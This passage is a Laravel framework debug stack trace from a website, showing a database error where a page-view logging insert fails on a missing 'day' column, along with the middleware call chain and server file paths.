     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:67)
  at Illuminate\Cookie\Middleware\EncryptCookies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:687)
  at Illuminate\Routing\Router->runRouteWithinStack(object(Route), object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:662)
  at Illuminate\Routing\Router->runRoute(object(Request), object(Route))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:628)
  at Illuminate\Routing\Router->dispatchToRoute(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:617)
  at Illuminate\Routing\Router->dispatch(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:165)
  at Illuminate\Foundation\Http\Kernel->Illuminate\Foundation\Http\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:128)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php:26)
  at App\Miya\Middlewares\FuckYou->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php:27)
  at Illuminate\Foundation\Http\Middleware\ValidatePostSize->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:63)
  at Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fruitcake/laravel-cors/src/HandleCors.php:37)
  at Fruitcake\Cors\HandleCors->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fideloper/proxy/src/TrustProxies.php:57)
  at Fideloper\Proxy\TrustProxies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:140)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:109)
  at Illuminate\Foundation\Http\Kernel->handle(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php:58)                

[1/3] PDOException

PDOException:
SQLSTATE[42S22]: Column not found: 1054 Unknown column 'day' in 'field list'

  at /home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:79
  at PDO->prepare('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array())
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:79)
  at Doctrine\DBAL\Driver\PDOConnection->prepare('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)')
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:485)
  at Illuminate\Database\Connection->Illuminate\Database\{closure}('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:664)
  at Illuminate\Database\Connection->runQueryCallback('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:631)
  at Illuminate\Database\Connection->run('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Connection.php:496)
  at Illuminate\Database\Connection->affectingStatement('insert ignore into `miya3_user_views` (`time`, `ip`, `day`, `referer_url`, `url`) values (?, ?, ?, ?, ?)', array('2024-03-28 17:26:10', '44.222.212.138', '2024-03-28', null, 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html'))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Query/Builder.php:2822)
  at Illuminate\Database\Query\Builder->insertOrIgnore(array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1422)
  at Illuminate\Database\Eloquent\Builder->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Support/Traits/ForwardsCalls.php:23)
  at Illuminate\Database\Eloquent\Model->forwardCallTo(object(Builder), 'insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1736)
  at Illuminate\Database\Eloquent\Model->__call('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Model.php:1748)
  at Illuminate\Database\Eloquent\Model::__callStatic('insertOrIgnore', array(array('time' => '2024-03-28 17:26:10', 'ip' => '44.222.212.138', 'day' => '2024-03-28', 'referer_url' => null, 'url' => 'http://www.jinjiayq.com/news/xin-wen-fen-lei-2/wsmyxzqmcsytdsj-7kim/%E5%B1%B1%E4%B8%9C%E6%B3%A8%E5%B0%84%E5%99%A8%E5%AF%86%E5%90%88%E6%80%A7%E6%AD%A3%E5%8E%8B%E6%B5%8B%E8%AF%95%E4%BB%AA%E5%8E%82%E5%AE%B6%E7%9B%B4%E9%94%80.html')))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:77)
  at App\Miya\Middlewares\UserView->addViewRecord()
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/UserView.php:29)
  at App\Miya\Middlewares\UserView->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CopyrightSign.php:20)
  at App\Miya\Middlewares\CopyrightSign->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/RegularClearCache.php:23)
  at App\Miya\Middlewares\RegularClearCache->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SourceCode.php:32)
  at App\Miya\Middlewares\SourceCode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/SensitiveWord.php:19)
  at App\Miya\Middlewares\SensitiveWord->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/CacheCheck.php:21)
  at App\Miya\Middlewares\CacheCheck->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php:41)
  at Illuminate\Routing\Middleware\SubstituteBindings->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:78)
  at Illuminate\Foundation\Http\Middleware\VerifyCsrfToken->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49)
  at Illuminate\View\Middleware\ShareErrorsFromSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:116)
  at Illuminate\Session\Middleware\StartSession->handleStatefulRequest(object(Request), object(Store), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:62)
  at Illuminate\Session\Middleware\StartSession->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37)
  at Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:67)
  at Illuminate\Cookie\Middleware\EncryptCookies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:687)
  at Illuminate\Routing\Router->runRouteWithinStack(object(Route), object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:662)
  at Illuminate\Routing\Router->runRoute(object(Request), object(Route))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:628)
  at Illuminate\Routing\Router->dispatchToRoute(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Routing/Router.php:617)
  at Illuminate\Routing\Router->dispatch(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:165)
  at Illuminate\Foundation\Http\Kernel->Illuminate\Foundation\Http\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:128)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/app/Miya/Middlewares/FuckYou.php:26)
  at App\Miya\Middlewares\FuckYou->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php:21)
  at Illuminate\Foundation\Http\Middleware\TransformsRequest->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php:27)
  at Illuminate\Foundation\Http\Middleware\ValidatePostSize->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:63)
  at Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fruitcake/laravel-cors/src/HandleCors.php:37)
  at Fruitcake\Cors\HandleCors->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/fideloper/proxy/src/TrustProxies.php:57)
  at Fideloper\Proxy\TrustProxies->handle(object(Request), object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:167)
  at Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:103)
  at Illuminate\Pipeline\Pipeline->then(object(Closure))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:140)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:109)
  at Illuminate\Foundation\Http\Kernel->handle(object(Request))
     (/home/jinjiayq9jdi5ndj2iqa4ylq/wwwroot/public/index.php:58)